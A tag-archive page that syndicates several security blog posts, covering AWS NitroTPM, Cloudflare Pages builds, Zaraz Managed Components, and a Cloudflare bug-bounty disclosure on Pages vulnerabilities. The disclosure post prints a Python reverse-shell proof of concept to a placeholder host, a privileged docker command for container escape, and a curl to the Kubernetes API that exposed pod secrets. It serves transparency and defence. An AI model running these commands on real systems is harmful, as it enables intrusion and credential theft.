Tag Archives: security

Amazon EC2 Now Supports NitroTPM and UEFI Secure Boot

Post Syndicated from Sébastien Stormacq original https://aws.amazon.com/blogs/aws/amazon-ec2-now-supports-nitrotpm-and-uefi-secure-boot/

In computing, Trusted Platform Module (TPM) technology is designed to provide hardware-based, security-related functions. A TPM chip is a secure crypto-processor that is designed to carry out cryptographic operations. There are three key advantages of using TPM technology. First, you can generate, store, and control access to encryption keys outside of the operating system. Second, you can use a TPM module to perform platform device authentication by using the TPM’s unique RSA key, which is burned into it. And third, it may help to ensure platform integrity by taking and storing security measurements.

During re:Invent 2021, we announced the future availability of NitroTPM, a virtual TPM 2.0-compliant TPM module for your Amazon Elastic Compute Cloud (Amazon EC2) instances, based on AWS Nitro System. We also announced Unified Extensible Firmware Interface (UEFI) Secure Boot availability for EC2.

I am happy to announce you can start to use both NitroTPM and Secure Boot today in all AWS Regions outside of China, including the AWS GovCloud (US) Regions.

You can use NitroTPM to store secrets, such as disk encryption keys or SSH keys, outside of the EC2 instance memory, protecting them from applications running on the instance. NitroTPM leverages the isolation and security properties of the Nitro System to ensure only the instance can access these secrets. It provides the same functions as a physical or discrete TPM. NitroTPM follows the ISO TPM 2.0 specification, allowing you to migrate existing on-premises workloads that leverage TPMs to EC2.

The availability of NitroTPM unlocks a couple of use cases to strengthen the security posture of your EC2 instances, such as secured key storage and access for OS-level volume encryption or platform attestation for measured boot or identity access.

Secured Key Storage and Access
NitroTPM can create and store keys that are wrapped and tied to certain platform measurements (known as Platform Configuration Registers – PCR). NitroTPM unwraps the key only when those platform measurements have the same value as they had at the moment the key was created. This process is referred to as “sealing the key to the TPM.” Decrypting the key is called unsealing. NitroTPM only unseals keys when the instance and the OS are in a known good state. Operating systems compliant with TPM 2.0 specifications use this mechanism to securely unseal volume encryption keys. You can use NitroTPM to store encryption keys for BitLocker on Microsoft Windows. Linux Unified Key Setup (LUKS) or dm-verity on Linux are examples of OS-level applications that can leverage NitroTPM too.

Platform Attestation
Another key feature that NitroTPM provides is “measured boot” a process where the bootloader and operating system extend PCRs with measurements of the software or configuration that they load during the boot process. This improves security in the event that, for example, a malicious program overwrites part of your kernel with malware. With measured boot, you can also obtain signed PCR values from the TPM and use them to prove to remote servers that the boot state is valid, enabling remote attestation support.

How to Use NitroTPM
There are three prerequisites to start using NitroTPM:

  • You must use an operating system that has Command Response Buffer (CRB) drivers for TPM 2.0, such as recent versions of Windows or Linux. We tested the following OSes: Red Hat Enterprise Linux 8, SUSE Linux Enterprise Server 15, Ubuntu 18.04, Ubuntu 20.04, and Windows Server 2016, 2019, and 2022.
  • You must deploy it on a Nitro-based EC2 instance. At the moment, we support all Intel and AMD instance types that support UEFI boot mode. Graviton1, Graviton2, Xen-based, Mac, and bare-metal instances are not supported.
  • Note that NitroTPM does not work today with some additional instance types, but support for these instance types will come soon after the launch. The list is: C6a, C6i, G4ad, G4dn, G5, Hpc6a, I4i, M6a, M6i, P3dn, R6i, T3, T3a, U-12tb1, U-3tb1, U-6tb1, U-9tb1, X2idn, X2iedn, and X2iezn.
  • When you create your own AMI, it must be flagged to use UEFI as boot mode and NitroTPM. Windows AMIs provided by AWS are flagged by default. Linux-based AMI are not flagged by default; you must create your own.

How to Create an AMI with TPM Enabled
AWS provides AMIs for multiple versions of Windows with TPM enabled. I can verify if an AMI supports NitroTPM using the DescribeImagesAPI call. For example:

aws ec2 describe-images --image-ids ami-0123456789

When NitroTPM is enabled for the AMI, “TpmSupport”: “v2.0” appears in the output, such as in the following example.

{
   "Images": [
      {
         ...
         "BootMode": "uefi",
         "TpmSupport": "v2.0"
      }
   ]
}

I may also query for tpmSupport using the DescribeImageAttribute API call.

When creating my own AMI, I may enable TPM support using the RegisterImage API call, by setting boot-mode to uefi and tpm-support to v2.0.

aws ec2 register-image             \
       --region us-east-1           \
       --name my-image              \
       --boot-mode uefi             \
       --architecture x86_64        \
       --root-device-name /dev/xvda \
       --block-device-mappings DeviceName=/dev/xvda,Ebs={SnapshotId=snap-0123456789example} DeviceName=/dev/xvdf,Ebs={VolumeSize=10} \
       --tpm-support v2.0

Now that you know how to create an AMI with TPM enabled, let’s create a Windows instance and configure BitLocker to encrypt the root volume.

A Walk Through: Using NitroTPM with BitLocker
BitLocker automatically detects and uses NitroTPM when available. There is no extra configuration step beyond what you do today to install and configure BitLocker. Upon installation, BitLocker recognizes the TPM module and starts to use it automatically.

Let’s go through the installation steps. I start the instance as usual, using an AMI that has both uefi and TPM v2.0 enabled. I make sure I use a supported version of Windows. Here I am using Windows Server 2022 04.13.

Once connected to the instance, I verify that Windows recognizes the TPM module. To do so, I launch the tpm.msc application, and the Trusted Platform Module (TPM) Management window opens. When everything goes well, it shows Manufacturer Name: AMZN under TPM Manufacturer Information.

Trusted Platform Module ManagementNext, I install BitLocker.

I open the servermanager.exe application and select Manage at the top right of the screen. In the dropdown menu, I select Add Roles and Features.

Add roles and featuresI select Role-based or feature-based installation from the wizard.

Install BitLocker - Step 1I select Next multiple times until I reach the Features section. I select BitLocker Drive Encryption, and I select Install.

Install BitLocker - Step 2I wait a bit for the installation and then restart the server at the end of the installation.

After reboot, I reconnect to the server and open the control panel. I select BitLocker Drive Encryption under the System and Security section.

Turn on Bitlocker - part 1I select Turn on BitLocker, and then I select Next and wait for the verification of the system and the time it takes to encrypt my volume’s data.

Just for extra safety, I decide to reboot at the end of the encryption. It is not strictly necessary. But I encrypted the root volume of the machine (C:) so I am wondering if the machine can still boot.

After the reboot, I reconnect to the instance, and I verify the encryption status.

Turn on Bitlocker - part 2I also verify BitLocker’s status and key protection method enabled on the volume. To do so, I open PowerShell and type

manage-bde -protectors -get C:

Bitlocker statusI can see on the resulting screen that the C: volume encryption key is coming from the NitroTPM module and the instance used Secure Boot for integrity validation. I can also view the recovery key.

I left the recovery key in plain text in the previous screenshot because the instance and volume I used for this demo will not exist anymore by the time you will read this. Do not share your recovery keys publicly otherwise.

Important Considerations
Now that I have shown how to use NitroTPM to protect BitLocker’s volume encryption key, I’ll go through a couple of additional considerations:

  • You can only enable an AMI for NitroTPM support by using the RegisterImage API via the AWS CLI and not via the Amazon EC2 console.
  • NitroTPM support is enabled by setting a flag on an AMI. After you launch an instance with the AMI, you can’t modify the attributes on the instance. The ModifyInstanceAttribute API is not supported on running or stopped instances.
  • Importing or exporting EC2 instances with NitroTPM, such as with the ImportImage API, will omit NitroTPM data.
  • The NitroTPM state is not included in EBS snapshots. You can only restore an EBS snapshot to the same EC2 instance.
  • BitLocker volumes that are encrypted with TPM-based keys cannot be restored on a different instance. It is possible to change the instance type (stop, change instance type, and restart it).

At the moment, we support all Intel and AMD instance types that supports UEFI boot mode. Graviton1, Graviton2, Xen-based, Mac, and bare-metal instances are not supported. Some additional instance types are not supported at launch (I shared the exact list previously). We will add support for these soon after launch.

There is no additional cost for using NitroTPM. It is available today in all AWS Regions, including the AWS GovCloud (US) Regions, except in China.

And now, go build 😉

— seb

A new era for Cloudflare Pages builds

Post Syndicated from Nevi Shah original https://blog.cloudflare.com/cloudflare-pages-build-improvements/

A new era for Cloudflare Pages builds

A new era for Cloudflare Pages builds

Music is flowing through your headphones. Your hands are flying across the keyboard. You’re stringing together a masterpiece of code. The momentum is building up as you put on the finishing touches of your project. And at last, it’s ready for the world to see. Heart pounding with excitement and the feeling of victory, you push changes to the main branch…. only to end up waiting for the build to execute each step and spit out the build logs.

Starting afresh

Since the launch of Cloudflare Pages, there is no doubt that the build experience has been its biggest source of criticism. From the amount of waiting to inflexibility of CI workflow, Pages had a lot of opportunity for growth and improvement. With Pages, our North Star has always been designing a developer platform that fits right into your workflow and oozes simplicity. User pain points have been and always will be our priority, which is why today we are thrilled to share a list of exciting updates to our build times, logs and settings!

Over the last three quarters, we implemented a new build infrastructure that speeds up Pages builds, so you can iterate quickly and efficiently. In February, we soft released the Pages Fast Builds Beta, allowing you to opt in to this new infrastructure on a per-project basis. This not only allowed us to test our implementation, but also gave our community the opportunity to try it out and give us direct feedback in Discord. Today we are excited to announce the new build infrastructure is now generally available and automatically enabled for all existing and new projects!

Faster build times

As a developer, your time is extremely valuable, and we realize Pages builds were slow. It was obvious that creating an infrastructure that built projects faster and smarter was one of our top requirements.

Looking at a Pages build, there are four main steps: (1) initializing the build environment, (2) cloning your git repository, (3) building the application, and (4) deploying to Cloudflare’s global network. Each of these steps is a crucial part of the build process, and upon investigating areas suitable for optimization, we directed our efforts to cutting down on build initialization time.

In our old infrastructure, every time a build job was submitted, we created a new virtual machine to run that build, costing our users precious dev time. In our new infrastructure, we start jobs on machines that are ready and waiting to be used, taking a major chunk of time away from the build initialization step. This step previously ran for 2+ minutes, but with our new infrastructure update, projects are expected to see a build initialization time cut down to 2-3 SECONDS.

This means less time waiting and more time iterating on your code.

Fast and secure

In our old build infrastructure, because we spun up a new virtual machine (VM) for every build, it would take several minutes to boot up and initialize with the Pages build image needed to execute the build. Alternatively, one could reuse a collection of VMs, assigning a new build to the next available VM, but containers share a kernel with the host operating system, making them far less isolated, posing a huge security risk. This could allow a malicious actor to perform a “container escape” to break out of their sandbox. We wanted the best of both worlds: the speed of a container with the isolation of a virtual machine.

Enter gVisor, a container sandboxing technology that drastically limits the attack surface of a host. In the new infrastructure, each container running with gVisor is given its own independent application “kernel,” instead of directly sharing the kernel with its host. Then, to address the speed, we keep a cluster of virtual machines warm and ready to execute builds so that when a new Pages deployment is triggered, it takes just a few seconds for a new gVisor container to start up and begin executing meaningful work in a secure sandbox with near native performance.

Stream your build logs

After we solidified a fast and secure build, we wanted to enhance the user facing build experience. Because a build may not be successful every time, providing you with the tools you need to debug and access that information as fast as possible is crucial. While we have a long list of future improvements for a better logging experience, today we are starting by enabling you to stream your build logs.

Prior to today, with the aforementioned build steps required to complete a Pages build, you were required to wait until the build completed in order to view the resulting build logs. Easily addressable issues like incorrectly inputting the build command or specifying an environment variable would have required waiting for the entire build to finish before understanding the problem.

Today, we’re giving you the power to understand your build issues as soon as they happen. Spend less time waiting for your logs and start debugging the events of your builds within a second or less after they happen!

Control Branch Builds

Finally, the build experience does not just include the events during execution but everything leading up to the trigger of a build. For our final trick, we’re enabling our users to have full control of the precise branches they’d like to include and exclude for automatic deployments.

Before today, Pages submitted builds for every commit in both production and preview environments, which led to queued builds and even more waiting if you exceeded your concurrent build limit. We wanted to provide even more flexibility to control your CI workflow. Now you can configure your build settings to specify branches to build, as well as skip ad hoc commits.

Specify branches to build

While “unlimited staging” is one of Pages’ greatest advantages, depending on your setup, sometimes automatic deployments to the preview environment can cause extra noise.

In the Pages build configuration setting, you can specify automatic deployments to be turned off for the production environment, the preview environment, or specific preview branches. In a more extreme case, you can even pause all deployments so that any commit sent to your git source will not trigger a new Pages build.

Additionally, in your project’s settings, you can now configure the specific Preview branches you would like to include and exclude for automatic deployments. To make this configuration an even more powerful tool, you can use wildcard syntax to set rules for existing branches as well as any newly created preview branches.

A new era for Cloudflare Pages builds

Read more in our Pages docs on how to get started with configuring automatic deployments with Wildcard Syntax.

Using CI Skip

Sometimes commits need to be skipped on an ad hoc basis. A small update to copy or a set of changes within a small timespan don’t always require an entire site rebuild. That’s why we also implemented a CI Skip command for your commit message, signaling to Pages that the update should be skipped by our builder.

With both CI Skip and configured build rules, you can keep track of your site changes in Pages’ deployment history.

A new era for Cloudflare Pages builds

Where we’re going

We’re extremely excited to bring these updates to you today, but of course, this is only the beginning of improving our build experience. Over the next few quarters, we will be bringing more to the build experience to create a seamless developer journey from site inception to launch.

Incremental builds and caching

From beta testing, we noticed that our new infrastructure can be less impactful on larger projects that use heavier frameworks such as Gatsby. We believe that every user on our developer platform, regardless of their use case, has the right to fast builds. Up next, we will be implementing incremental builds to help Pages identify only the deltas between commits and rebuild only files that were directly updated. We will also be implementing other caching strategies such as caching external dependencies to save time on subsequent builds.

Build image updates

Because we’ve been using the same build image we launched Pages with back in 2021, we are going to make some major updates. Languages release new versions all the time, and we want to make sure we update and maintain the latest versions. An updated build image will mean faster builds, more security and of course supporting all the latest versions of languages and tools we provide. With new build image versions being released, we will allow users to opt in to the updated builds in order to maintain compatibility with all existing projects.

Productive error messaging

Lastly, while streaming build logs helps you to identify those easily addressable issues, the infamous “Internal error occurred” is sometimes a little more cryptic to decipher depending on the failure. While we recently published a “Debugging Cloudflare Pages” guide, in the future we’d like to provide the error feedback in a more productive manner, so you can easily identify the issue.

Have feedback?

As always, your feedback defines our roadmap. With all the updates we’ve made to our build experience, it’s important we hear from you! You can get in touch with our team directly through Discord. Navigate to our Pages specific section and check out our various channels specific to different parts of the product!

Join us at Cloudflare Connect!

Interested in learning more about building with Cloudflare Pages? If you’re based in the New York City area, join us on Thursday, May 12th for a series of workshops on how to build a full stack application on Pages! Follow along with a fully hands-on lab, featuring Pages in conjunction with other products like Workers, Images and Cloudflare Gateway, and hear directly from our product managers. Register now!

Open source Managed Components for Cloudflare Zaraz

Post Syndicated from Yo'av Moshe original https://blog.cloudflare.com/zaraz-open-source-managed-components-and-webcm/

Open source Managed Components for Cloudflare Zaraz

Open source Managed Components for Cloudflare Zaraz

In early 2020, we sat down and tried thinking if there’s a way to load third-party tools on the Internet without slowing down websites, without making them less secure, and without sacrificing users’ privacy. In the evening, after scanning through thousands of websites, our answer was “well, sort of”. It seemed possible: many types of third-party tools are merely collecting information in the browser and then sending it to a remote server. We could theoretically figure out what it is that they’re collecting, and then instead just collect it once efficiently, and send it server-side to their servers, mimicking their data schema. If we do this, we can get rid of loading their JavaScript code inside websites completely. This means no more risk of malicious scripts, no more performance losses, and fewer privacy concerns.

But the answer wasn’t a definite “YES!” because we realized this is going to be very complicated. We looked into the network requests of major third-party scripts, and often it seemed cryptic. We set ourselves up for a lot of work, looking at the network requests made by tools and trying to figure out what they are doing – What is this parameter? When is this network request sent? How is this value hashed? How can we achieve the same result more securely, reliably and efficiently? Our team faced these questions on a daily basis.

When we joined Cloudflare, the scale of everything changed. Suddenly we were on thousands of websites, serving more than 10,000 requests per second. Users are writing to us every single day over our Discord channel, the community forum, and sometimes even directly on Twitter. More often than not, their messages would be along the lines of “Hi! Can you please add support for X?” Cloudflare Zaraz launched with around 30 tools in its library, but this market is vast and new tools are popping up all the time.

Changing our trust model

In my previous blog post on how Zaraz uses Cloudflare Workers, I included some examples of how tool integrations are written in Zaraz today. Usually, a “tool” in Zaraz would be a function that prepares a payload and sends it. This function could return one thing – clientJS, JavaScript code that the browser would later execute. We’ve done our best so that tools wouldn’t use clientJS, if it wasn’t really necessary, and in reality most Zaraz-built tool integrations are not using clientJS at all.

This worked great, as long as we were the ones coding all tool integrations. Customers trusted us that we’d write code that is performant and safe, and they trusted the results they saw when trying Zaraz. Upon joining Cloudflare, many third-party tool vendors contacted us and asked to write a Zaraz integration. We quickly realized that our system wasn’t enforcing speed and safety – vendors could literally just dump their old browser-side JavaScript into our clientJS variable, and say “We have a Cloudflare Zaraz integration!”, and that wasn’t our vision at all.

We want third-party tool vendors to be able to write their own performant, safe server-side integrations. We want to make it possible for them to reimagine their tools in a better way. We also want website owners to have transparency into what is happening on their website, to be able to manage and control it, and to trust that if a tool is running through Zaraz, it must be a good tool — not because of who wrote it, but because of the technology it is constructed within. We realized that to achieve that we needed a new format for defining third-party tools.

Introducing Managed Components

We started rethinking how third-party code should be written. Today, it’s a black box – you usually add a script to your site, and you have zero clue what it does and when. You can’t properly read or analyze the minified code. You don’t know if the way it behaves for you is the same way it behaves for everyone else. You don’t know when it might change. If you’re a website owner, you’re completely in the dark.

Tools do many different things. The simple ones just collected information and sent it somewhere. Often, they’d set some cookies. Sometimes, they’d install some event listeners on the page. And widget-based tools can literally manipulate the page DOM, providing new functionality like a social media embed or a chatbot. Our new format needed to support all of this.

Managed Components is how we imagine the future of third-party tools online. It provides vendors with an API that allows them to do much more than a normal script can, including keeping code execution outside the browser. We designed this format together with vendors, for vendors, while having in mind that users’ best interest is everyone’s best interest long-term.

From the get-go, we built Managed Components to use a permission-based system. We want to provide even more transparency than Zaraz does today. As the new API allows tools to set cookies, change the DOM or collect IP addresses, all those abilities require being granted a permission. Installing a third-party tool on your site is similar to installing an app on your phone – you get an explanation of what the tool can and can’t do, and you can allow or disallow features to a granular level. We previously wrote about how you can use Zaraz to not send IP addresses to Google Analytics, and now we’re doubling down in this direction. It’s your website, and it’s your decision to make.

Every Managed Component is a JavaScript module at its core. Unlike today, this JavaScript code isn’t sent to the browser. Instead, it is executed by a Components Manager. This manager implements the APIs that are then used by the component. It dispatches server-side events that originate in the browser, providing the components with access to information while keeping them sandboxed and performant. It handles caching, storage and more — all so that the Managed Components can implement their logic without worrying so much about the surrounding.

An example analytics Managed Component can look something like this:

export default function (manager) {
  manager.addEventListener("pageview", ({ context, client }) => {
    fetch("https://example.com/collect", {
  	method: "POST",
  	data: {
    	  url: context.page.url.href,
    	  userAgent: client.device.userAgent,
  	},
    });
  });
}

The above component gets notified whenever a page view occurs, and it then creates some payload with the visitor user-agent and page URL and sends that as a POST request to the vendor’s server. This is very similar to how things are done today, except this doesn’t require running any code at all in the browser.

But Managed Components aren’t just doing what was previously possible but better, they also provide dramatic new functionality. See for example how we’re exposing server-side endpoints:

export default function (manager) {
  const api = manager.proxy("/api", "https://api.example.com");
  const assets = manager.serve("/assets", "assets");
  const ping = manager.route("/ping", (request) => new Response(204));
}

These three lines are a complete shift in what’s possible for third-parties. If granted the permissions, they can proxy some content, serve and expose their own endpoints – all under the same domain as the one running the website. If a tool needs to do some processing, it can now off-load that from the browser completely without forcing the browser to communicate with a third-party server.

Exciting new capabilities

Every third-party tool vendor should be able to use the Managed Components API to build a better version of their tool. The API we designed is comprehensive, and the benefits for vendors are huge:

  • Same domain: Managed Components can serve assets from the same domain as the website itself. This allows a faster and more secure execution, as the browser needs to trust and communicate with only one server instead of many. This can also reduce costs for vendors as their bandwidth will be lowered.
  • Website-wide events system: Managed Components can hook to a pre-existing events system that is used by the website for tracking events. Not only is there no need to provide a browser-side API to your tool, it’s also easier for your users to send information to your tool because they don’t need to learn your methods.
  • Server logic: Managed Components can provide server-side logic on the same domain as the website. This includes proxying a different server, or adding endpoints that generate dynamic responses. The options are endless here, and this, too, can reduce the load on the vendor servers.
  • Server-side rendered widgets and embeds: Did you ever notice how when you’re loading an article page online, the content jumps when some YouTube or Twitter embed suddenly appears between the paragraphs? Managed Components provide an API for registering widgets and embed that render server-side. This means that when the page arrives to the browser, it already includes the widget in its code. The browser doesn’t need to communicate with another server to fetch some tweet information or styling. It’s part of the page now, so expect a better CLS score.
  • Reliable cross-platform events: Managed Components can subscribe to client-side events such as clicks, scroll and more, without needing to worry about browser or device support. Not only that – those same events will work outside the browser too – but we’ll get to that later.
  • Pre-Response Actions: Managed Components can execute server-side actions before the network response even arrives in the browser. Those actions can access the response object, reading it or altering it.
  • Integrated Consent Manager support: Managed Components are predictable and scoped. The Component Manager knows what they’ll need and can predict what kind of consent is needed to run them.

The right choice: open source

As we started working with vendors on creating a Managed Component for their tool, we heard a repeating concern – “What Components Managers are there? Will this only be useful for Cloudflare Zaraz customers?”. While Cloudflare Zaraz is indeed a Components Manager, and it has a generous free tier plan, we realized we need to think much bigger. We want to make Managed Components available for everyone on the Internet, because we want the Internet as a whole to be better.

Today, we’re announcing much more than just a new format.

WebCM is a reference implementation of the Managed Components API. It is a complete Components Manager that we will soon release and maintain. You will be able to use it as an SDK when building your Managed Component, and you will also be able to use it in production to load Managed Components on your website, even if you’re not a Cloudflare customer. WebCM works as a proxy – you place it before your website, and it rewrites your pages when necessary and adds a couple of endpoints. This makes WebCM 100% framework-agnostic – it doesn’t matter if your website uses Node.js, Python or Ruby behind the scenes: as long as you’re sending out HTML, it supports that.

That’s not all though! We’re also going to open source a few Managed Components of our own. We converted some of our classic Zaraz integrations to Managed Components, and they will soon be available for you to use and improve. You will be able to take our Google Analytics Managed Component, for example, and use WebCM to run Google Analytics on your website, 100% server-side, without Cloudflare.

Tech-leading vendors are already joining

Revolutionizing third-party tools on the internet is something we could only do together with third-party vendors. We love third-party tools, and we want them to be even more popular. That’s why we worked very closely with a few leading companies on creating their own Managed Components. These new Managed Components extend Zaraz capabilities far beyond what’s possible now, and will provide a safe and secure onboarding experience for new users of these tools.

Open source Managed Components for Cloudflare Zaraz

DriftDrift helps businesses connect with customers in moments that matter most.  Drift’s integration will let customers use their fully-featured conversation solution while also keeping it completely sandboxed and without making third-party network connections, increasing privacy and security for our users.

Open source Managed Components for Cloudflare Zaraz

CrazyEggCrazy Egg helps customers make their websites better through visual heatmaps, A/B testing, detailed recordings, surveys and more. Website owners, Cloudflare, and Crazy Egg all care deeply about performance, security and privacy. Managed Components have enabled Crazy Egg to do things that simply aren’t possible with third-party JavaScript, which means our mutual customers will get one of the most performant and secure website optimization tools created.

We also already have customers that are eager to implement Managed Components:

Open source Managed Components for Cloudflare Zaraz

Hopin Quote:

“I have been really impressed with Cloudflare’s Zaraz ability to move Drift’s JS library to an Edge Worker while loading it off the DOM. My work is much more effective due to the savings in page load time. It’s a pleasure to work with two companies that actively seek better ways to increase both page speed and load times with large MarTech stacks.”
– Sean Gowing, Front End Engineer, Hopin

If you’re a third-party vendor, and you want to join these tech-leading companies, do reach out to us, and we’d be happy to support you on writing your own Managed Component.

What’s next for Managed Components

We’re working on Managed Components on many fronts now. While we develop and maintain WebCM, work with vendors and integrate Managed Components into Cloudflare Zaraz, we’re already thinking about what’s possible in the future.

We see a future where many open source runtimes exist for Managed Components. Perhaps your infrastructure doesn’t allow you to use WebCM? We want to see Managed Components runtimes created as service workers, HTTP servers, proxies and framework plugins. We’re also working on making Managed Components available on mobile applications. We’re working on allowing unofficial Managed Components installs on Cloudflare Zaraz. We’re fixing a long-standing issue of the WWW, and there’s so much to do.

We will very soon publish the full specs of Managed Components. We will also open source WebCM, the reference implementation server, as well as many components you can use yourself. If this is interesting to you, reach out to us at [email protected], or join us on Discord.

The Cloudflare Bug Bounty program and Cloudflare Pages

Post Syndicated from Evan Johnson original https://blog.cloudflare.com/pages-bug-bounty/

The Cloudflare Bug Bounty program and Cloudflare Pages

The Cloudflare Bug Bounty program and Cloudflare Pages

The Cloudflare Pages team recently collaborated closely with security researchers at Assetnote through our Public Bug Bounty. Throughout the process we found and have fully patched vulnerabilities discovered in Cloudflare Pages. You can read their detailed write-up here. There is no outstanding risk to Pages customers. In this post we share information about the research that could help others make their infrastructure more secure, and also highlight our bug bounty program that helps to make our product more secure.

Cloudflare cares deeply about security and protecting our users and customers — in fact, it’s a big part of the reason we’re here. But how does this manifest in terms of how we run our business? There are a number of ways. One very important prong of this is our bug bounty program that facilitates and rewards security researchers for their collaboration with us.

But we don’t just fix the security issues we learn about — in order to build trust with our customers and the community more broadly, we are transparent about incidents and bugs that we find.

Recently, we worked with a group of researchers on improving the security of Cloudflare Pages. This collaboration resulted in several security vulnerability discoveries that we quickly fixed. We have no evidence that malicious actors took advantage of the vulnerabilities found. Regardless, we notified the limited number of customers that might have been exposed.

In this post we are publicly sharing what we learned, and the steps we took to remediate what was identified. We are thankful for the collaboration with the researchers, and encourage others to use the bounty program to work with us to help us make our services — and by extension the Internet — more secure!

What happens when a vulnerability is reported?

Once a vulnerability has been reported via HackerOne, it flows into our vulnerability management process:

  1. We investigate the issue to understand the criticality of the report.
  2. We work with the engineering teams to scope, implement, and validate a fix to the problem. For urgent problems we start working with engineering immediately, and less urgent issues we track and prioritize alongside engineering’s normal bug fixing cadences.
  3. Our Detection and Response team investigates high severity issues to see whether the issue was exploited previously.

This process is flexible enough that we can prioritize important fixes same-day, but we never lose track of lower criticality issues.

What was discovered in Cloudflare Pages?

The Pages team had to solve a pretty difficult problem for Cloudflare Builds (our CI/CD build pipeline): how can we run untrusted code safely in a multi-tenant environment? Like all complex engineering problems, getting this right has been an iterative process. In all cases, we were able to quickly and definitively address bugs reported by security researchers. However, as we continued to work through reports by the researchers, it became clear that our initial build architecture decisions provided too large an attack surface. The Pages team pivoted entirely and re-architected our platform in order to use gVisor and further isolate builds.

When determining impact, it is not enough to find no evidence that a bug was exploited, we must conclusively prove that it was not exploited. For almost all the bugs reported, we found definitive signals in audit logs and were able to correlate that data exclusively against activity by trusted security researchers.

However, for one bug, while we found no evidence that the bug was exploited beyond the work of security researchers, we were not able meaningfully prove that it was not. In the spirit of full transparency, we notified all Pages users that may have been impacted.

Now that all the issues have been remedied, and individual customers have been notified, we’d like to share more information about the issues.

Bug 1: Command injection in CLONE_REPO

With a flaw in our logic during build initialization, it was possible to execute arbitrary code, echo environment variables to a file and then read the contents of that file.

The Cloudflare Bug Bounty program and Cloudflare Pages

The crux of the bug was that root_dir in this line of code was attacker controlled. After gaining control the researcher was able to specially craft a malicious root_dir to dump the environment variables of the process to a file. Those environment variables contained our GitHub bot’s authorization key. This would have allowed the attacker to read the repositories of other Pages’ customers, and many of those repositories are private.

The Cloudflare Bug Bounty program and Cloudflare Pages

After fixing the input validation for this field to prevent the bug, and rolling the disclosed keys, we investigated all other paths that had ever been set by our Pages customers to see if this attack had ever been performed by any other (potentially malicious) security researchers. We had logs showing that this was the first this particular attack had ever been performed, and responsibly reported.

Bug 2: Command injection in PUBLISH_ASSETS

This bug is nearly identical to the first one, but on the publishing step instead of the clone step. We went to work rotating the secrets that were exposed, fixing the input validation issues, and rotating the exposed secrets. We investigated the Cloudflare audit logs to confirm that the sensitive credentials had not been used by anyone other than our build infrastructure, and within the scope of the security research being performed.

Bug 3: Cloudflare API key disclosure in the asset publishing process

While building customer pages, a program called /opt/pages/bin/pages-metadata-generator is involved. This program had the Linux permissions of 777, allowing all users on the machine to read the program, execute the program, but most importantly overwrite the program. If you can overwrite the program prior to its invocation, the program might run with higher permissions when the next user comes along and wants to use it.

In this case the attack is simple. When a Pages build runs, the following build.sh is specified to run, and it can overwrite the executable with a new one.

#!/bin/bash
cp pages-metadata-generator /opt/pages/bin/pages-metadata-generator

This allows the attacker to provide their own pages-metadata-generator program that is run with a populated set of environment variables. The proof of concept provided to Cloudflare was this minimal reverse shell.

#!/bin/bash
echo "henlo fren"
export > /tmp/envvars
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("x.x.x.x.x",9448));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

With a reverse shell, the attackers only need to run `env` to see a list of environment variables that the program was invoked with. We fixed the file permissions of the process, rotated the credentials, and investigated in Cloudflare audit logs to confirm that the sensitive credentials had not been used by anyone other than our build infrastructure, and within the scope of the security research.

Bug 4: Bash path injection

This issue was very similar to Bug 3. The PATH environment variable contained a large set of directories for maximum compatibility with different developer tools.

PATH=/opt/buildhome/.swiftenv/bin:/opt/buildhome/.swiftenv/shims:/opt/buildhome/.php:/opt/buildhome/.binrc/bin:/usr/local/rvm/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/buildhome/.cask/bin:/opt/buildhome/.gimme/bin:/opt/buildhome/.dotnet/tools:/opt/buildhome/.dotnet

Unfortunately not all of these directories were set to the proper filesystem permissions allowing a malicious version of the program bash to be written to them, and later invoked by the Pages build process. We patched this bug, rotated the impacted credentials, and investigated in Cloudflare audit logs to confirm that the sensitive credentials had not been used by anyone other than our build infrastructure, and within the scope of the security research.

Bug 5: Azure pipelines escape

Back when this research was conducted we were running Cloudflare Pages on Azure Pipelines. Builds were taking place in highly privileged containers and the containers had the docker socket available to them. Once the researchers had root within these containers, escaping them was trivial after installing docker and mounting the root directory of the host machine.

sudo docker run -ti --privileged --net=host -v /:/host -v /dev:/dev -v /run:/run ubuntu:latest

Once they had root on the host machine, they were able to recover Azure DevOps credentials from the host which gave access to the Azure Organization that Cloudflare Pages was running within.

The credentials that were recovered gave access to highly audited APIs where we could validate that this issue was not previously exploited outside this security research.

Bug 6: Pages on Kubernetes

After receipt of the above bugs,  we decided to change the architecture  of Pages. One of these changes was migration of the product from Azure to Kubernetes, and simplifying the workflow, so the attack surface was smaller and defensive programming practices were easier to implement. After the change, Pages builds are within Kubernetes Pods and are seeded with the minimum set of credentials needed.

As part of this migration, we left off a very important iptables rule in our Kubernetes control plane, making it easy to curl the Kubernetes API and read secrets related to other Pods in the cluster (each Pod representing a separate Pages build).

curl -v -k [http://10.124.200.1:10255/pods](http://10.124.200.1:10255/pods)

We quickly patched this issue with iptables rules to block network connections to the Kubernetes control plane. One of the secrets available to each Pod was the GitHub OAuth secret which would have allowed someone who exploited this issue to read the GitHub repositories of other Pages’ customers.

In the previously reported issues we had robust logs that showed us that the attacks that were being performed had never been performed by anyone else. The logs related to inspecting Pods were not available to us, so we decided to notify all Cloudflare Pages customers that had ever had a build run on our Kubernetes-based infrastructure. After patching the issue and investigating which customers were impacted, we emailed impacted customers on February 3 to tell them that it’s possible someone other than the researcher had exploited this issue, because our logs couldn’t prove otherwise.

Takeaways

We are thankful for all the security research performed on our Pages product, and done so at such an incredible depth. CI/CD and build infrastructure security problems are notoriously hard to prevent. A bug bounty that incentivizes researchers to keep coming back is invaluable, and we appreciate working with researchers who were flexible enough to perform great research, and work with us as we re-architected the product for more robustness. An in-depth write-up of these issues is available from the Assetnote team on their website.

More than this, however, the work of all these researchers is one of the best ways to test the security architecture of any product. While it might seem counter-intuitive after a post listing out a number of bugs, all these diligent eyes on our products allow us to feel much more confident in the security architecture of Cloudflare Pages. We hope that our transparency, and our description of the work done on our security posture, enables you to feel more confident, too.

Finally: if you are a security researcher, we’d love to work with you to make our products more secure. Check out hackerone.com/cloudflare for more info!

Secret Management with HashiCorp Vault

Post Syndicated from Mitz Amano original https://blog.cloudflare.com/secret-management-with-hashicorp-vault/

Secret Management with HashiCorp Vault

Secret Management with HashiCorp Vault

